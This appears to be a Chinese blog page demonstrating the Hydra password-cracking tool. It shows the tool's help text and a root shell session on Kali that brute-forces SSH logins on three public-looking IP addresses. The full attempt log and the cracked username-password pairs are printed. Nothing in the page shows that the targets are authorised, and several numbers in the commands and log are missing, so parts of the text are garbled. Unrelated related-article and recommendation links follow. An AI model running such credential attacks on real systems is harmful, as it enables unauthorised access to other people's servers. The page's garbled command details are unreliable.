安全工具-Hydra
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]
Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
# 待破解的主机列表
root@kali:~# cat serverlist
189.37.178.1
189.37.178.216
189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c) by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have seconds to abort...
[DATA] max tasks per servers, overall tasks, login tries (l:/p:), ~ tries per task
[DATA] attacking service ssh on port
[VERBOSE] Resolving addresses ... done
[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22
[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[][ssh] host:189.37.178.98 login: root
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - of [child ]
[][ssh] host:189.37.178.1 login: pentest password:
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - of [child ]
[][ssh] host:189.37.178.216 login: oracle password: oracle
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
of targets successfully completed, valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表 root@kali:~# cat output.txt
# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh)
[][ssh] host: 189.37.178.98 login: root
[][ssh] host: 189.37.178.1 login: pentest password:
[][ssh] host: 189.37.178.216 login: oracle password: oracle
安全工具-Hydra的更多相关文章
- 路由器密码破解工具 Hydra 7.5
之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...
- Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用
Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...
- 暴力破解工具hydra与Medusa
---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...
- (总结)Linux下的暴力密码在线破解工具Hydra详解
(总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869
- 初试在线破解工具Hydra爆破3389服务器
hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...
- Linux下暴力破解工具Hydra详解
一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...
- [转]Linux下的暴力密码破解工具Hydra详解
摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...
- linux下暴力破解工具hydra【转】
一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...
- linux暴力密码破解工具hydra安装与使用
说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...
- Kali中密码暴力破解工具hydra的使用
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...
随机推荐
- ubuntu安装虚拟环境
首先 sudo pip install virtualenv sudo pip install virtualenvwrapper 然后进行配置 sudo gedit /.bashrc export ...
- C# 简单学习正则表达式
第一步先要引入有关正则式的命名空间: using System.Text.RegularExpressions; 第二步用指定的正则式构建一个正则表达式对象,下面的正则式是用来搜 ...
- z-index使用及一定要加backgroun
代码: <div> <span style="display:block;width:40px;height:20px;border:1px solid red;posit ...
- Spring Boot基础讲解
Spring Boot Spring Boot 是由Pivotal团队提供的框架,它并不是一个全新的框架,而是将已有的 Spring 组件整合起来,设计目的是用来简化新Spring应用的初始搭建以及开 ...
- Tomcat安装与环境变量的配置
Tomacat的下载 去Tomcat官网下载,我使用的是apache-tomcat-7.0.78的版本. 安装 下载完成之后,我们解压缩到相应的目录.这里我解压缩到d盘下面 1.然后去配置系统的环 ...
- gravity 和 layout_gravity
gravity : 是控件内部的内容的对齐方式. layout_gravity: 是控件相对于其容器的对齐方式. 如果 LinearLayout 的 android:orientation=&qu ...
- __getitem__函数
主要是为了探究第三行为什么打印出很多提示信息,然后探究了下为什么有第三行这种写法,是因为 这个类中定义了def __getitem__(self, query),这样就可以类似于list那种用法了.但 ...
- 小甲鱼Python第五讲课后习题
0.Python中,int表示整型 bool:布尔类型 float:浮点型 str:字符串类型 1.为什么布尔类型(bool)的TRUE和FALSE分别用0和1表示? 计算机只认识二进制,由于二进制只 ...
- linux操作之逻辑分区与交换分区篇
作业一: 1) 开启Linux系统前添加一块大小为15G的SCSI硬盘 2) 开启系统,右击桌面,打开终端 3) 为新加的硬盘分区,一个主分区大小为5G,剩余空间给扩展分区,在扩展分区上划 ...
- Vue(十四)过渡(动画)
过渡(动画) 1. 简介 Vue 在插入.更新或者移除 DOM 时,提供多种不同方式的应用过渡效果 本质上还是使用CSS3动画:transition.animation 2. 基本用法 使用trans ...